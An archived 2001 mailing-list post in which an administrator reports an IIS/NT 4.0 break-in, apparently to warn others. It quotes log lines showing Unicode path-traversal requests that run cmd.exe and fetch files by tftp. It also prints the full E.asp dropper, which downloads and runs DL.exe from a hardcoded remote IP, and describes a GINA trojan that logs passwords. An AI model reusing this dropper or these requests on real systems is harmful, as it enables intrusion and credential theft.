OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ron Grove (rgroveHOTMAIL.COM)
Date: Sun Feb 25 2001 - 11:15:18 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello,

    Just wanted to share some of the footprints of a hack that we had on one of
    our NT servers. This is not everything I am sure. It was too important to
    rebuild and secure the server for the users usage again. If anyone else has
    noticed this please let me know. We are curious what else was put on the
    machine beyond what we found. Attempts were made against other servers as
    well.

    Config:
    Windows NT 4.0 with SP6a
    Runs Exchange 5.5 SP4, IIS 4.0, MS Proxy Server 2.0

    Initially noticed logfile problem with UNICODE exploit. Then noticed
    os2srv.exe running in taskmanager and as a service. os2srv.exe was then
    killed and sud.exe appeared out of nowhere in processes. Can't find sud.exe
    so find is possibly trojaned.

    They initially got in with the UNICODE exploit from a few months back. Here
    is the snip from the logs:

    xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
    234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe,
    /c+dir+c:\,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:54, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
    188, 141, 379, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe,
    E.asp+-r,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:20, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
    16, 142, 396, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe,
    /c+del+E.asp,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
    2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe,
    -i+rooted.ntserver.com+get+E.asp,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
    1781, 101, 225, 200, 0, GET, /scripts/E.asp, -,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:37, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
    15, 196, 355, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe,
    E.asp+-r,
    xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:41, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
    15, 197, 355, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe,
    /c+del+E.asp,

    We contacted the source IP who had been contacted by another attacked site.
    A CERT report was already generated by the other party. The text of E.asp
    is:

    <%
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set drv = fs.Drives
    dmax = ""
    dmac = 0
    For each d in drv
    If d.Driveletter <> "A" And d.IsReady Then
    If d.AvailableSpace > dmac then
    dmac = d.AvailableSpace
    dmab = d.DriveType
    dmaa = d.TotalSize
    dmad = d.SerialNumber
    dmax = d.DriveLetter
    End If
    End If
    Next
    filename = server.mappath("dl.bat")
    Set tf = fs.CreateTextFile(filename, True)
    tf.WriteLine("echo off")
    tf.WriteLine("cd \Inetpub\scripts")
    tf.WriteLine("startDL:")
    tf.WriteLine("tftp.exe -i 216.205.125.115 get DL.exe")
    tf.WriteLine("if not exist DL.exe goto startDL")
    tf.WriteLine("start /w DL.exe")
    tf.WriteLine("ren 00.D install.bat")
    tf.WriteLine("attrib TFTP* -r")
    tf.WriteLine("attrib DL.exe -r")
    tf.WriteLine("del TFTP*")
    tf.WriteLine("del DL.exe")
    tf.WriteLine("install.bat %1")
    tf.WriteLine("exit")
    tf.Close
    dim command
    dim wshShell
    command = server.mappath("dl.bat") & " " & dmax
    On Error Resume Next
    Set wshShell = CreateObject("WScript.Shell")
    wshShell.Run (command)
    If Err Then
    Set objFSO = Server.CreateObject("scripting.filesystemobject")
    pathname = server.mappath("dl.bat")
    objFSO.DeleteFile pathname
    Set objFSO = Nothing
    Else
    Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
    dmad
    End If
    %>
    ----------------------------
    This file downloads DL.exe from the remote host, executes it (which
    uncompresses a group of files) then runs an install.
    A directory listing follows:
    -----------------------------
    09/24/1997 12:06a 1,942 environ.ksh
    09/24/1997 12:06a 1,323 profile.ksh
    02/20/2001 04:52p 1,289 E.asp
    02/20/2001 05:11p 5,120 DL.exe
    02/20/2001 05:12p 2,201 00.D
    02/20/2001 05:12p 64 01.D
    02/20/2001 05:12p 32,256 02.D
    02/20/2001 05:12p 344 03.D
    02/20/2001 05:12p 349,696 04.D
    02/20/2001 05:12p 28,672 05.D
    02/20/2001 05:12p 24,576 06.D
    02/20/2001 05:12p 70,211 07.D
    02/20/2001 05:12p 18,276 08.D
    02/20/2001 05:12p 28,432 09.D
    02/20/2001 05:12p 35,981 10.D
    02/20/2001 05:12p 427,520 11.D
    02/20/2001 05:12p 12,288 12.D
    02/20/2001 05:12p 6,867 13.D

    00.D gets renamed to install.bat, then executed.

    A new directory also appears about this time. It is found in a different
    drive (in our case E:\ since D:\ was the CDROM). It is under a new
    directory call E:\Adminback0801\root\system\dll and nothing is in it.

    In the C:\Winnt\System32\os2\ directory a new hidden folder called "New" was
    present. I contained:
    FireDaemon.exe
    dir.txt
    login.txt
    RemScan.txt
    SUD.exe
    SUD.bak

    It's security was set to SYSTEM Full Access. FireDaemon was used to create
    an INDEX service and a OS2SRV service.

    A trojan .dll was placed in C:\Winnt\System32 called NewGina.dll.
    HKLM/Software/Windows NT/Software/Winlogon/NewGina key was created with the
    path to the NewGina trojan. A key called OriginalGinaDll was created with
    pcAnywhere's awgina.dll entry. NewGina.dll creates a .tmp file on C:\ that
    captures logon passwords. It is appended to with the current password after
    every logon so that changed passwords are also caught. The file is
    formatted and produced by the NewGina.dll and contains the following text:

    WlxNegotiate.
    WlxInitialize.
    WlxDisplaySASNotice.
    WlxLoggedOutSAS, SasType=1.
    WlxDisplaySASNotice.
    WlxDisplaySASNotice.
    WlxLoggedOutSAS, SasType=1.
    user Administrator has logged on to domain OURSERVER with password
    CURRENT_ADMIN_PASSWORD.
    user is a member of the Administrators group.
    returned profile information:
        type 2
        profile path: (null)
        policy path: \\OURSERVER\netlogon\ntconfig.pol
        server: \\OURSERVER
        LOGONSERVER=\\OURSERVER
    WlxActivateUserShell.
    WlxLoggedOnSAS, SasType=1.
    WlxDisplayLockedNotice.
    WlxWkstaLockedSAS, SasType=1.
    WlxLoggedOnSAS, SasType=1.
    WlxDisplayLockedNotice.
    WlxIsLockOk.
    WlxDisplayLockedNotice.
    WlxIsLockOk.
    WlxDisplayLockedNotice.
    WlxWkstaLockedSAS, SasType=1.
    WlxLoggedOnSAS, SasType=1.
    WlxDisplayLockedNotice.
    WlxIsLockOk.
    WlxDisplayLockedNotice.
    WlxWkstaLockedSAS, SasType=1.
    WlxLoggedOnSAS, SasType=1.

    A new ftp server is also installed called UServ or something like that (I
    forget right now). Too much to try to clean so rebuilding and securing is
    probably the best route.

    Hope this helps someone.

    Thanks,
    Ron
    _________________________________________________________________
    Get your FREE download of MSN Explorer at http://explorer.msn.com